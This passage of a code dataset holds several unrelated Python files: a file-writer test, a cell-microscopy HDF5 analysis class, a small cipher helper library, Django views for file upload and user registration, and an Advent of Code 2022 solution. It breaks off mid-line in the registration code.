self.assertEquals(\"baz.tmp\", writer.file_name)\n\n def test_hashable(self):\n s = set([FileWriter(\"foo\")])\n s.add(FileWriter(\"foo\"))\n self.assertEquals(1, len(s))\n\n def test_write_lines(self):\n with TempDirectory() as output_file:\n writer = FileWriter(os.path.join(output_file.path, \"A.tmp\"))\n writer.open()\n writer.write(\"1\\n2\\n\")\n writer.write(\"3\")\n writer.close()\n\n actual_file = open(os.path.join(output_file.path, \"A.tmp\"))\n actual_output = actual_file.readlines()\n actual_file.close()\n\n self.assertEquals([\"1\\n\", \"2\\n\", \"3\"], actual_output)\n","sub_path":"test/utils/vcf_test.py","file_name":"vcf_test.py","file_ext":"py","file_size_in_byte":44156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"223131493","text":"# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n# #\n# ----- POST-PROCESSING OF HDF FILES: APPENDING DATA OF ----- #\n# LOCAL CELL DENSITY, NUCLEUS SIZE & DNA CONTENT #\n# FROM FLUORESCENCE SIGNAL INTENSITY #\n# #\n# ----- Creator: Kristina ULICNA ----- #\n# #\n# ----- Last updated: 31th Jan 2020 ----- #\n# #\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\nimport os\nimport sys\nimport h5py\nimport math\nimport numpy as np\nimport scipy.spatial as sp\nimport matplotlib.pyplot as plt\n\nfrom scipy.ndimage import label, find_objects\nfrom tqdm import tqdm\nfrom skimage import io\nfrom PIL import Image\n\nsys.path.append(\"../\")\nfrom Movie_Analysis_Pipeline.Single_Movie_Processing.Server_Movies_Paths import Get_MDCK_Movies_Paths\n\n\nclass Local_Density_Nucleus_Size_Fluo_Signal(object):\n\n def __init__(self, hdf5_file):\n \"\"\" Open & read data from chosen HDF5 file. TODO: This class only processes GFP cells. Deal with it!\n :param hdf5_file (str): absolute directory to file: .../HDF/segmented.hdf5\n \"\"\"\n\n self.hdf5_file = hdf5_file\n self.hdf5_file_to_read = h5py.File(hdf5_file, 'r')\n self.movie_length = len(self.hdf5_file_to_read[\"objects\"][\"obj_type_1\"][\"map\"])\n self.channels = len(list(self.hdf5_file_to_read.values())[0])\n\n GFP_length = len(self.hdf5_file_to_read[\"objects\"][\"obj_type_1\"][\"coords\"])\n\n if \"obj_type_1\" not in list(self.hdf5_file_to_read[\"objects\"]):\n raise ValueError(\"GFP channel not detected in the HDF5 file.\")\n\n self.position = hdf5_file.split(\"/pos\")[1].split(\"/\")[0]\n self.data_date = hdf5_file.split(\"/pos{}\".format(self.position))[0][-6:]\n\n # Initialise the movie if processing fluo_intensity:\n if self.data_date.startswith(\"AB\"):\n raw_movie = \"/Volumes/lowegrp/Data/Kristina/MDCK_WT_Pure/17_{}_{}/pos{}/GFP_pos{}.tif\" \\\n .format(self.data_date[2:4], self.data_date[4:6], self.position, self.position)\n self.raw_movie = io.imread(raw_movie)\n\n # Vectors to return:\n self.density = [0 for _ in range(GFP_length)]\n self.nucleus = [0 for _ in range(GFP_length)]\n self.fsignal = [0 for _ in range(GFP_length)]\n\n\n def Extract_Cell_Coords(self, frame):\n \"\"\" Extract the GFP and RFP cell coordinates, remembering the indexes of these cells.\n\n :param frame (int)\n :return: cell_coords (numpy.ndarray) [[x_coord, y_coord] [x_coord, y_coord] ... ]\n cell_map (numpy.ndarray) [[0 88] [0 20]] -> indices of GFP & RFP cells per frame\n \"\"\"\n\n cell_coords = []\n cell_map = []\n\n for channel in range(1, self.channels + 1):\n map = self.hdf5_file_to_read[\"objects\"][\"obj_type_{}\".format(channel)][\"map\"][frame]\n cell_map.append(map)\n for cell in range(map[0], map[1]):\n cell_data = self.hdf5_file_to_read[\"objects\"][\"obj_type_{}\".format(channel)][\"coords\"][cell]\n cell_coords.append([cell_data[1], cell_data[2]])\n return np.array(cell_coords), np.array(cell_map)\n\n\n def Return_Partial_Density(self, a, b, c):\n \"\"\" Construct the triangle given the 'x' & 'y' coordinates of the nuclei centroids.\n 1.) Calculate the lengths of the edges of the triangle.\n 2.) Compute the approximate area of the whole cell.\n 3.) Return a cell density, i.e. an inverse of the cell area.\n\n :param a, b, c (lists) -> [x_coord, y_coord] where 'x_coord' & 'y_coord' are (float)\n :return partial_density (float) -> density of the triangle contributing to the cell's area\n \"\"\"\n\n a_edge = np.sqrt((b[0] - c[0]) ** 2 + (b[1] - c[1]) ** 2)\n b_edge = np.sqrt((a[0] - c[0]) ** 2 + (a[1] - c[1]) ** 2)\n c_edge = np.sqrt((a[0] - b[0]) ** 2 + (a[1] - b[1]) ** 2)\n\n s = (a_edge + b_edge + c_edge) / 2\n partial_area = np.sqrt(s * (s - a_edge) * (s - b_edge) * (s - c_edge))\n\n if partial_area == \"nan\" or partial_area <= 0:\n return 0.0\n else:\n return 1 / partial_area\n\n\n def Calculate_Local_Density(self, frame, show=False):\n \"\"\" \"\"\"\n\n # 1.) Extract the coordinates of all GFP & RFP cells at specified frame:\n cell_coords, cell_map = self.Extract_Cell_Coords(frame=frame)\n\n # Take care of blank frames:\n if len(cell_coords) < 3: # a triangle cannot be created\n return [0.0 for _ in range(len(cell_coords))]\n\n # 2.) Use the coordinates to construct the Delaunay triangulation of all GFP & RFP cells:\n tri = sp.Delaunay(cell_coords)\n if show is True:\n _ = sp.delaunay_plot_2d(tri=tri)\n plt.xlim(0, 1200)\n plt.ylim(0, 1600)\n plt.title(\"Delaunay Triangulation for Local Density Calculations\")\n plt.xlabel(\"FiJi Y-axis (pixels)\")\n plt.ylabel(\"FiJi X-axis (pixels)\")\n plt.show()\n plt.close()\n\n # 3.) Create an array of the length of points:\n densities = [0 for _ in range(len(tri.points))]\n\n # 4.) Calculate the density of each triangle & add to vertex:\n for vertex_index, vertex_coords in zip(tri.simplices, cell_coords[tri.simplices]):\n density = self.Return_Partial_Density(a=vertex_coords[0], b=vertex_coords[1], c=vertex_coords[2])\n for index in vertex_index:\n densities[index] += density\n\n # 5.) Write these definitive cell densities into the big density array:\n self.density[cell_map[0][0]:cell_map[0][1]] = np.array(densities, dtype=np.float64)\n\n # 6.) Return an intermediate so you can check if correctly calculated:\n return densities\n\n\n # ---------------------------------------------------------------------------------------------------\n\n def Calculate_Nuclei_Sizes(self, frame, show=False):\n \"\"\" Process the respective binary mask (U-Net output with segmented labels)\n to extract the pixel values of the image into 2D matrix to return.\n\n 1.) Import the 'segmentation' binary mask image & label the pixel values of individual objects.\n 2.) Allocate the nuclei centroids from HDF file to each uniquely labelled blob in the binary mask.\n 3.) Count the occurence of the label in the processed binary mask & store it's row & column indices.\n 4.) Access the corresponding pixels in the raw fluorescence image to calculate average signal intensity.\n \"\"\"\n\n cell_coords, cell_map = self.Extract_Cell_Coords(frame=frame)\n pixels = self.hdf5_file_to_read[\"segmentation\"][\"images\"][frame]\n\n # Enumerate different objects in the map with unique label & find those objects in the image:\n object_labels, num_features = label(input=pixels)\n found_objects = find_objects(object_labels)\n\n if num_features != len(found_objects):\n raise ValueError(\"Warning, number of labelled objects & the objects found with unique label are not equal!\")\n\n # Visualise the binary map & labelled map:\n if show is True:\n plt.imshow(X=pixels) # plots a 2D array straight ahead!\n plt.title(\"Raw Segmented Binary Mask at frame #{}\".format(frame))\n plt.show()\n plt.close()\n\n plt.imshow(X=object_labels) # plots a 2D array straight ahead!\n plt.title(\"Labelled Segmented Binary Mask at frame #{}\".format(frame))\n plt.show()\n plt.close()\n\n # Match coords to its unique label & sum the appearance of the label in the slice:\n nuclei_size = []\n for coords in cell_coords:\n x, y = int(math.floor(coords[0])), int(math.floor(coords[1]))\n pixel_label = object_labels[x][y]\n image_slice = object_labels[found_objects[pixel_label - 1]]\n nucleus_size = sum([list(row).count(pixel_label) for row in image_slice])\n nuclei_size.append(nucleus_size)\n\n # Append these sizes into the final array:\n self.nucleus[cell_map[0][0]:cell_map[0][1]] = np.array(nuclei_size, dtype=np.float64)\n\n return nuclei_size, object_labels, found_objects\n\n\n # ---------------------------------------------------------------------------------------------------\n\n def Calculate_Fluo_Intensity(self, frame, show=False):\n \"\"\" Calculate the average fluorescence intensity of the nucleus based on the pixel value readouts\n from areas superimposed by uniquely labelled binary mask areas by summing them up & averaging.\n\n :param! raw_images (str) -> absolute directory to folder:\n\n Anna's movies: e.g./Volumes/lowegrp/Data/Kristina/MDCK_WT_Pure/17_07_31/pos8/...\n which contains STACK TIFFs: 'BF_pos8.tif', 'GFP_pos8.tif', 'RFP_pos8.tif'\n Giulia's movies: e.g./Volumes/lowegrp/Data/Guilia/GV0800/pos0/Pos0_aligned/\n which contains original BF, GFP & RFP images: e.g.\n 'img_channel001_position013_time000001104_z000.tif'\n \"\"\"\n\n cell_coords, cell_map = self.Extract_Cell_Coords(frame=frame)\n nuclei_size, object_labels, found_objects = self.Calculate_Nuclei_Sizes(frame=frame)\n fluo_signal_intensity_sum = [0 for _ in range(len(nuclei_size))]\n\n # Initialise the raw images for Anna's & Giulia's movies:\n if self.data_date.startswith(\"AB\"):\n raw_image = self.raw_movie[frame]\n\n elif self.data_date.startswith(\"GV\"):\n raw_image = \"/Volumes/lowegrp/Data/Giulia/{}/pos{}/Pos{}_aligned/img_channel001_position{}_time00000{}_z000.tif\" \\\n .format(self.data_date, self.position, self.position, self.position.zfill(3), str(frame).zfill(4))\n\n elif self.data_date.startswith(\"KU\"):\n raw_image = \"/Volumes/lowegrp/Data/Kristina/Cells_HeLa/{}/Pos{}/img_channel001_position{}_time00000{}_z000.tif\" \\\n .format(self.data_date, self.position, self.position.zfill(3), str(frame).zfill(4))\n else:\n raise Exception(\"Directory data_date starts with either 'AB' nor 'GV' nor 'KU'!\")\n\n\n # Check if the frame exist & resize appropriately:\n if not os.path.isfile(raw_image):\n return np.array(fluo_signal_intensity_sum, dtype=np.float64)\n\n # Process the full-sized image (1739 x 1379 pixels):\n image = Image.open(raw_image).convert('L') # converts the image to 8-bit grayscale\n img_w, img_h = image.size # stores image dimensions:\n new_w, new_h = 1600, 1200\n\n # Define center & crop image accordingly... TODO: Python & FiJi have different offsets!\n if img_w != new_w or img_h != new_h:\n left = (img_w - 1 - new_w) / 2\n top = (img_h - 1 - new_h) / 2\n right = (img_w - 1 + new_w) / 2\n bottom = (img_h - 1 + new_h) / 2\n raw_image = np.array(image.crop((left, top, right, bottom))) # convert 'PIL.Image.Image' to 'numpy.ndarray'\n\n # Superimpose the segmented masks with unique labels to the raw fluorescence readout images:\n if len(cell_coords) != len(nuclei_size):\n raise ValueError(\"Not every cell nucleus had had it's size calculated.\")\n\n for enum, (coords, size) in enumerate(zip(cell_coords, nuclei_size)):\n if size == 0:\n fluo_signal_intensity_sum[enum] = 0.0\n else:\n x, y = int(math.floor(coords[0])), int(math.floor(coords[1]))\n pixel_label = object_labels[x][y]\n found_loc = found_objects[pixel_label - 1]\n image_slice_mask = object_labels[found_loc]\n image_slice_fluo = raw_image[found_loc]\n\n # This script calculates the sum of the signal intensity per whole nucleus:\n for row_mask, row_fluo in zip(image_slice_mask, image_slice_fluo):\n for label_pixel, raw_pixel in zip(row_mask, row_fluo):\n if label_pixel == pixel_label:\n fluo_signal_intensity_sum[enum] += raw_pixel\n\n self.fsignal[cell_map[0][0]:cell_map[0][1]] = np.array(fluo_signal_intensity_sum, dtype=np.float64)\n return np.array(fluo_signal_intensity_sum, dtype=np.float64)\n\n\n # ---------------------------------------------------------------------------------------------------\n\n def Process_Whole_Movie(self, local_density=False, nucleus_size=False, fluo_signal=False):\n \"\"\" \"\"\"\n\n for frame in tqdm(range(0, self.movie_length)):\n #for frame in tqdm(range(0, 10)):\n\n #if frame % 100 == 0:\n # print(\"\\nCalculating for frame #{} out of {} frames...\".format(frame, self.movie_length))\n\n if local_density is True:\n self.Calculate_Local_Density(frame=frame)\n if nucleus_size is True:\n self.Calculate_Nuclei_Sizes(frame=frame)\n if fluo_signal is True:\n self.Calculate_Fluo_Intensity(frame=frame)\n\n if self.hdf5_file_to_read.__bool__():\n self.hdf5_file_to_read.close()\n\n return self.density, self.nucleus, self.fsignal\n\n\n def Append_To_HDF(self, local_density=False, nucleus_size=False, fluo_signal=False):\n\n density, nucleus, fsignal = self.Process_Whole_Movie(local_density=local_density,\n nucleus_size=nucleus_size,\n fluo_signal=fluo_signal)\n\n with h5py.File(self.hdf5_file, 'a') as f:\n\n if local_density is True:\n if \"local_density\" in list(f[\"objects\"][\"obj_type_1\"]):\n del f[\"objects\"][\"obj_type_1\"][\"local_density\"]\n grp_d = f[\"objects\"][\"obj_type_1\"]\n grp_d.create_dataset(name=\"local_density\", data=density)\n\n if nucleus_size is True:\n if \"nucleus_size\" in list(f[\"objects\"][\"obj_type_1\"]):\n del f[\"objects\"][\"obj_type_1\"][\"nucleus_size\"]\n grp_n = f[\"objects\"][\"obj_type_1\"]\n grp_n.create_dataset(name=\"nucleus_size\", data=nucleus)\n\n if fluo_signal is True:\n if \"fluo_signal_sum\" in list(f[\"objects\"][\"obj_type_1\"]):\n del f[\"objects\"][\"obj_type_1\"][\"fluo_signal_sum\"]\n grp_f = f[\"objects\"][\"obj_type_1\"]\n grp_f.create_dataset(name=\"fluo_signal_sum\", data=fsignal)\n\n\n def __exit__(self):\n self.hdf5_file_to_read.close()\n\n\n\n\n# Call the class:\nmovies = Get_MDCK_Movies_Paths()\n\nfor movie in movies:\n if \"GV\" in movie:\n hdf5_file = movie + \"HDF/segmented.hdf5\"\n print (\"Calculating for {}\".format(hdf5_file))\n Local_Density_Nucleus_Size_Fluo_Signal(hdf5_file=hdf5_file).Append_To_HDF(nucleus_size=True, fluo_signal=True)\n\n","sub_path":"PostProcessing_HDF_Data/Local_Density_Nucleus_Size_Fluo_Signal_Create_Class.py","file_name":"Local_Density_Nucleus_Size_Fluo_Signal_Create_Class.py","file_ext":"py","file_size_in_byte":15432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"350431364","text":"#library file of shared functions\nimport sys\nimport string\n\n\ndef caesar(text, key):\n for i in text:\n if i.isalpha():\n i = i.lower()\n shifted = chr( ord(i) + key)\n if shifted.isalpha() == 0:\n shifted = chr( ord(shifted) - 26)\n sys.stdout.write(shifted)\n else:\n sys.stdout.write(i)\n\n\ndef removeDuplicates(text): #remove duplicate characters in a string\n seen = set()\n unique = []\n for char in text:\n if char not in seen:\n seen.add(char)\n unique.append(char)\n\n return \"\".join(unique) #string of unique characters\n\n\ndef chunkText(text): #chunk string of text into blocks of 2 with a space in between each chunk\n chunked = \"\"\n for c in range(0, len(text), 2):\n chunked = chunked + text[c:c+2] + \" \"\n\n return chunked\n\n\ndef replaceCharacters(text, in_table, out_table): #replace chars from 'in_table' with chars from 'out_table'\n table = string.maketrans(in_table, out_table)\n return text.translate(table)\n\n\ndef findLetter(dictionary, row, column): #find a key in a dictionary where the associated value is a tuple of numbers\n for k, v in dictionary.iteritems(): #iterate over key-value pairs to find key with specific value we searched for\n if v == (row, column): #'k' stands for key of dictionary, 'v' is a value associated with a key in a dictionary\n return k\n\n\ndef onlyAlphabetChars(text):\n text = filter(lambda c: c.isalpha(), text)\n return text\n ","sub_path":"P01/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"144826716","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport os\nfrom django.http import HttpResponseRedirect\nfrom Workgroup.models import UploadFile, Links_Tables, Metalinks\nfrom Workgroup.settings import STATICFILES_DIRS\nfrom file_manage.forms import UploadForm\nfrom django.contrib import messages\n\nfrom django.utils.translation import ugettext as _\n\ndef addfile(request, src_name, src_id):\n if not request.user.is_authenticated():\n return HttpResponseRedirect('/welcome/')\n\n if request.method == 'POST':\n link = Links_Tables.objects.get(Src_name=src_name.upper(), Dst_name=\"FILES\")\n metalink = Metalinks.objects.filter(Link_tables=link, Src_id=src_id)\n if not link:\n messages.error(request, _(u'Невозможно добавить файл'))\n return HttpResponseRedirect(request.META['HTTP_REFERER'])\n if metalink:\n parent_id = metalink[0].Dst_id\n else:\n parent_id = 0\n\n\n uploadform = UploadForm(request.POST or None, request.FILES or None)\n if uploadform.is_valid():\n f =request.FILES['File']\n if parent_id:\n new_file = UploadFile(FileName=f.name, Owner=request.user, File=f, Parent_id=parent_id)\n new_file.save()\n else:\n new_file = UploadFile(FileName=f.name, Owner=request.user, File=f)\n new_file.save()\n metalink = Metalinks(Link_tables=link, Src_id=src_id, Dst_id=new_file.id)\n metalink.save()\n messages.success(request, _(u'Файл был добавлен'))\n else:\n uploadform = UploadForm(None, None)\n \n return HttpResponseRedirect(request.META['HTTP_REFERER'])\n \n \ndef delfile(request, file_id):\n if not request.user.is_authenticated():\n return HttpResponseRedirect('/welcome/')\n \n try:\n del_file = UploadFile.objects.get(id=file_id) \n except:\n messages.error(request, _(u'Файл не найден'))\n return HttpResponseRedirect(request.META['HTTP_REFERER'])\n \n if del_file.Owner != request.user:\n messages.error(request, _(u'Недостаточно прав'))\n else:\n print((STATICFILES_DIRS[0] + str(del_file.File)))\n if os.path.isfile(STATICFILES_DIRS[0] + str(del_file.File)):\n os.remove(STATICFILES_DIRS[0] + str(del_file.File))\n f_name = del_file.FileName\n del_file.delete()\n messages.success(request, str(f_name) + _(u' был успешно удален'))\n\n \n return HttpResponseRedirect(request.META['HTTP_REFERER'])","sub_path":"file_manage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"431079436","text":"# tags: sliding window\n\nfrom compytetive.util import benchmark\nfrom compytetive import sliding_window\n\n\ndef read_input(filename):\n with open(filename, \"r\", encoding=\"utf-8\") as f:\n data = f.read()\n return data\n\n\ndef part1(data):\n for i, w in enumerate(sliding_window(data, 4, 1)):\n if len(set(w)) == len(w):\n return i + 4\n\n\ndef part2(data):\n for i, w in enumerate(sliding_window(data, 14, 1)):\n if len(set(w)) == len(w):\n return i + 14\n\n\ndef main():\n test1_input = read_input(\"test1.in\")\n real_input = read_input(\"input.in\")\n\n print(benchmark(part1, 50)(real_input))\n print(benchmark(part2, 50)(real_input))\n\n assert part1(test1_input) == 7\n assert part2(test1_input) == 19\n assert part1(real_input) == 1175\n assert part2(real_input) == 3217\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"advent-of-code-2022/06/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"317515943","text":"# -*- coding: UTF-8 -*-\nimport hashlib\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User, Permission\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.urlresolvers import reverse\nfrom django.db import IntegrityError\nfrom django.http import HttpResponseRedirect\nimport django.apps\n\n\nfrom DeBar.classes import message\nfrom DeBar.classes.cadastros.cargo import C_Cargo\nfrom DeBar.classes.captcha import Captcha\nfrom DeBar.classes.endereco.cep import CEP\nfrom DeBar.classes.endereco.complemento import Complemento\nfrom DeBar.classes.endereco.estado import Estado\nfrom DeBar.classes.endereco.numero import Numero\nfrom DeBar.classes.endereco.ruabairrocidade import RuaBairroCidade\nfrom DeBar.classes.estabelecimento.cnpj import CNPJ\nfrom DeBar.classes.estabelecimento.nome import NomeEstabelecimento\nfrom DeBar.classes.estabelecimento.tipoestabelecimento import TipoEstabelecimentoSelecionado\nfrom DeBar.classes.sendemail import SendEmail\nfrom DeBar.classes.texto import Text\nfrom DeBar.classes.usuario.cpf import CPF\nfrom DeBar.classes.usuario.email import Email\nfrom DeBar.classes.usuario.nome import Nome, Sobrenome\nfrom DeBar.classes.usuario.nomeusuario import NomeUsuario\nfrom DeBar.classes.usuario.senha import Senha\nfrom DeBar.classes.usuario.telefone import Telefone\nfrom DeBar.classes.variavel import Variavel\nfrom DeBar.funcoes.function import getCadastro, getUser\nfrom DeBar.funcoes.function import getSessionVariavel\nfrom DeBar.funcoes.function import setSessionVariavel\nfrom DeBar.funcoes.render import renderizar\nfrom DeBar.models import Cargo\nfrom DeBar.models.cadastro import Cadastro, Usuario\nfrom DeBar.models.estabelecimento import TipoEstabelecimento, Estabelecimento\n\n\ndef cadastraBasico (request):\n\n return renderizar(request, 'cadastro.html')\n\n############################################################################################################\n############################################################################################################\n\n@login_required\ndef dadosPessoais (request, id=None):\n\n#########################################################################################################\n# pega o usuário logado e checa se ele ainda está ativo na sessão #\n#########################################################################################################\n try:\n user = request.user\n cadastro = Cadastro.objects.get(usuario_id = user.id)\n except:\n message.erro(request, Text().login_expirou())\n return HttpResponseRedirect(reverse('LOGIN_PRINCIPAL'))\n\n#########################################################################################################\n# monta a variavel com todos os dados para caso haja um erro #\n# dessa maneiras os campos já preenchidos continuam com seu valor #\n# e os avisos são mostrados em cada campo #\n#########################################################################################################\n\n variavel = Variavel({\"nome\": user.first_name,\n \"sobrenome\": user.last_name,\n \"email\": cadastro.email,\n \"telefone\": cadastro.telefone})\n\n\n setSessionVariavel(request, variavel)\n\n return renderizar(request, 'cadastro_dados_pessoais.html')\n\n############################################################################################################\n############################################################################################################\n\n@login_required\ndef dadosEstabelecimento(request):\n\n#########################################################################################################\n# busca os dados do usuário #\n#########################################################################################################\n try:\n user = request.user\n cadastro = Cadastro.objects.get(usuario_id = user.id)\n except:\n message.erro(request, Text().login_expirou())\n return HttpResponseRedirect(reverse('LOGIN_PRINCIPAL'))\n\n#########################################################################################################\n# monta a variavel com todos os dados para caso haja um erro #\n# se não houver variavel ainda, busca o nome do estabelecimento #\n# do cadastro já feito #\n#########################################################################################################\n\n variavel = getSessionVariavel(request)\n\n if not variavel:\n variavel = Variavel({\"nomeEstabelecimento\":cadastro.nomeEstabelecimento})\n\n setSessionVariavel(request, variavel)\n\n tipoEstabelecimento = TipoEstabelecimento.objects.filter(ativo = True)\n\n return renderizar(request, 'cadastro_estabelecimento.html', tipoEstabelecimento)\n\n############################################################################################################\n############################################################################################################\n\ndef emailenviado(request):\n\n return renderizar(request, 'cadastro_emailenviado.html')\n\n############################################################################################################\n############################################################################################################\n\ndef reenviaremail (request):\n\n nome = \"\"\n email = \"\"\n\n#########################################################################################################\n# busca a variavel da sessão para pegar o email para reenvid #\n#########################################################################################################\n\n variavel = getSessionVariavel(request)\n nome = variavel['nome'].valor\n email = variavel['email'].valor\n\n if email:\n\n #se tiver um email o codifica e envia novamente\n hash = hashlib.md5(email)\n try:\n SendEmail().email_cadastro(nome, email, hash)\n except:\n pass\n message.mensagem(request, Text().email_enviado_novamente())\n return HttpResponseRedirect(reverse('CADASTRAR_EMAILENVIADO'))\n\n else:\n message.erro(request, Text().email_nao_cadastrado())\n return HttpResponseRedirect(reverse('CADASTRAR'))\n\n############################################################################################################\n############################################################################################################\n\ndef validaremail(request, hash):\n\n#########################################################################################################\n# pega o hash d URL e checa se existe um cadastro com a mesma hash #\n#########################################################################################################\n\n try:\n cadastro = Cadastro.objects.get(hashcode = hash)\n except ObjectDoesNotExist:\n message.erro(request, Text().cadastro_nao_existe())\n return HttpResponseRedirect(reverse('CADASTRAR'))\n except:\n message.erro(request, Text().nao_existe_ou_nao_encontrado())\n return HttpResponseRedirect(reverse('CADASTRAR'))\n\n#########################################################################################################\n# valida se aquele email já foi validado anteriormente #\n#########################################################################################################\n\n if cadastro.checado:\n message.erro(request, Text().email_ja_validado())\n return HttpResponseRedirect(reverse('LOGIN_PRINCIPAL'))\n\n#########################################################################################################\n# se o email nao tiver sido validado o validar e salva o cadastro #\n#########################################################################################################\n\n try:\n cadastro.checado = True\n user = User.objects.get(id = cadastro.usuario.id)\n user.is_active = True\n user.save()\n cadastro.save()\n except:\n message.erro(request, Text().erro_comunicacao_banco_dados() +\" \"+ Text().email_nao_validado())\n\n message.mensagem(request, Text().email_validado_sucesso())\n return HttpResponseRedirect(reverse('LOGIN_PRINCIPAL'))\n\n############################################################################################################\n############################################################################################################\n\ndef validarCadastroBasico(request):\n\n#########################################################################################################\n# busca toda as variáveis vindas da tela e monta as classes #\n#########################################################################################################\n\n nome = Nome(request.POST.get('nome'))\n estabelecimento = NomeEstabelecimento(request.POST.get('estabelecimento'))\n email = Email(request.POST.get('email'))\n telefone = Telefone(request.POST.get('telefone'))\n usuario = NomeUsuario(request.POST.get('usuario'))\n senha = Senha(request.POST.get('senha'), request.POST.get('senharepetida'))\n captcha = Captcha(request.POST.get('g-recaptcha-response'))\n\n#########################################################################################################\n# monsta a variavel para levar os dados de volta para tela, caso #\n# algum dado tenha erro #\n#########################################################################################################\n\n variavel = Variavel({'nome': nome,\n 'nomeEstabelecimento': estabelecimento,\n 'email': email,\n 'telefone': telefone,\n 'usuario': usuario,\n 'senha': senha\n #'captcha': captcha\n })\n\n setSessionVariavel(request, variavel)\n\n#########################################################################################################\n# se tudo tiver com status de valido, cria o usuário djando de sistema #\n# esse é o usuário que é usado para fazer login no sistema #\n#########################################################################################################\n\n if (variavel.valida()):\n user = None\n try:\n nome.valor.strip(\" \")\n if \" \" in nome.valor:\n\n user = User.objects.create_user(username=usuario.valor, password= senha.valor,\n first_name= nome.valor.split(' ', 1)[0], last_name = nome.valor.split(' ', 1)[1])\n else:\n\n user = User.objects.create_user(username=usuario.valor, password= senha.valor,\n first_name= nome.valor, last_name = \"\")\n user.is_active = False\n user.save()\n except IntegrityError:\n message.erro(request, Text().usuario_mesmo_username())\n return HttpResponseRedirect(reverse('CADASTRAR'))\n except:\n message.erro(request, Text().erro_banco_criar_usuario)\n return HttpResponseRedirect(reverse('CADASTRAR'))\n\n#########################################################################################################\n# cria o objeto cadastro no banco de dados. O objeto cadastro é #\n# uma espécie de usuário temporário, guardando dados até que o #\n# cliente complete todos os estágios do cadastro #\n#########################################################################################################\n\n try:\n hash = hashlib.md5(email.valor)\n cadastroInicial = Cadastro(usuario = User.objects.get(username = usuario.valor),\n email = email.valor,\n nomeEstabelecimento = estabelecimento.valor,\n telefone = telefone.valor,\n hashcode = hash.hexdigest(),\n checado = False,\n )\n cadastroInicial.save()\n except IntegrityError as e:\n user.delete()\n message.erro(request, Text().usuario_email_repetido())\n return HttpResponseRedirect(reverse('CADASTRAR'))\n except Exception as e:\n user.delete()\n message.erro(request, Text().erro_banco_criar_usuario)\n return HttpResponseRedirect(reverse('CADASTRAR'))\n\n#########################################################################################################\n# envia o email para que o usuário possa validar seu cadastro inicial #\n#########################################################################################################\n try:\n SendEmail().email_cadastro(nome.valor, email.valor, hash)\n\n except Exception as e:\n coisa = e.message\n pass\n\n return HttpResponseRedirect(reverse('CADASTRAR_EMAILENVIADO'))\n\n else:\n message.erro(request, Text().dados_inconsistentes())\n return HttpResponseRedirect(reverse('CADASTRAR'))\n\n############################################################################################################\n############################################################################################################\n\n@login_required\ndef validarCadastroDadosPessoais(request):\n\n#########################################################################################################\n# busca toda as variáveis vindas da tela e monta as classes #\n#########################################################################################################\n\n nome = Nome(request.POST.get('nome'))\n sobrenome = Sobrenome(request.POST.get('sobrenome'))\n email = Email(request.POST.get('email'))\n cpf = CPF(request.POST.get('cpf'))\n telefone = Telefone(request.POST.get('telefone'))\n celular = Telefone(request.POST.get('celular'))\n\n#########################################################################################################\n# monsta a variavel para levar os dados de volta para tela, caso #\n# algum dado tenha erro #\n#########################################################################################################\n\n variavel = Variavel({'nome': nome,\n 'sobrenome': sobrenome,\n 'email': email,\n 'cpf': cpf,\n 'telefone': telefone,\n 'celular': celular})\n\n setSessionVariavel(request, variavel)\n\n#########################################################################################################\n# checa se já existe um usuário ou um cadastro com o CPF informado #\n#########################################################################################################\n\n try:\n\n usuario = Cadastro.objects.get(cpf=cpf)\n cad = Usuario.objects.get(cpf = cpf)\n\n if usuario or cad:\n message.erro(request, Text().usuario_cadastrado_cpf())\n return HttpResponseRedirect(reverse('LOGIN_PRINCIPAL'))\n except ObjectDoesNotExist:\n pass\n\n#########################################################################################################\n# se o usuário for novo, monta o objeto user do django e salva com todos os dados #\n# salva os demais dados no cadastro e seta o cadastro como completo #\n#########################################################################################################\n\n if variavel.valida():\n\n user = getUser(request)\n cadastro = getCadastro(request)\n\n try:\n userCadastrado = User.objects.get(id= user.id)\n userCadastrado.first_name = nome.valor\n userCadastrado.last_name = sobrenome.valor\n userCadastrado.save()\n\n cadastro.cpf = cpf.valor\n cadastro.telefone = telefone.valor\n cadastro.celular = celular.valor\n cadastro.cadastroDadosPessoaisCompleto = True\n cadastro.save()\n\n except IntegrityError as e:\n message.erro(request, Text().usuario_ja_existe())\n except Exception as e:\n message.erro(request, Text().erro_banco_criar_usuario())\n return HttpResponseRedirect(reverse('CADASTRAR_DADOS_PESSOAIS'))\n\n del request.session['variavel']\n return HttpResponseRedirect(reverse('CADASTRAR_ESTABELECIMENTO'))\n else:\n message.erro(request, Text().dados_inconsistentes())\n return HttpResponseRedirect(reverse('CADASTRAR_DADOS_PESSOAIS'))\n\n############################################################################################################\n############################################################################################################\n\n@login_required\ndef validarCadastroEstabelecimento(request):\n\n#########################################################################################################\n# busca toda as variáveis vindas da tela e monta as classes #\n#########################################################################################################\n\n nomeEstabelecimento = NomeEstabelecimento(request.POST.get('estabelecimento'))\n cnpj = CNPJ(request.POST.get('cnpj'))\n tipoEstabelecimento = TipoEstabelecimentoSelecionado(request.POST.get('tipoestabelecimento'))\n\n numero = Numero(request.POST.get('numero'))\n complemento = Complemento(request.POST.get('complemento'))\n\n#########################################################################################################\n# instancia a classe de CEP e conecta ao site dos correios para pegar os dados #\n# caso não consiga buscar os dados do correio, os dados informados pelo #\n# usuário na tela são os que vão ser salvos #\n#########################################################################################################\n\n cep = CEP(request.POST.get('cep'))\n\n if cep.dadosEndereco:\n rua = 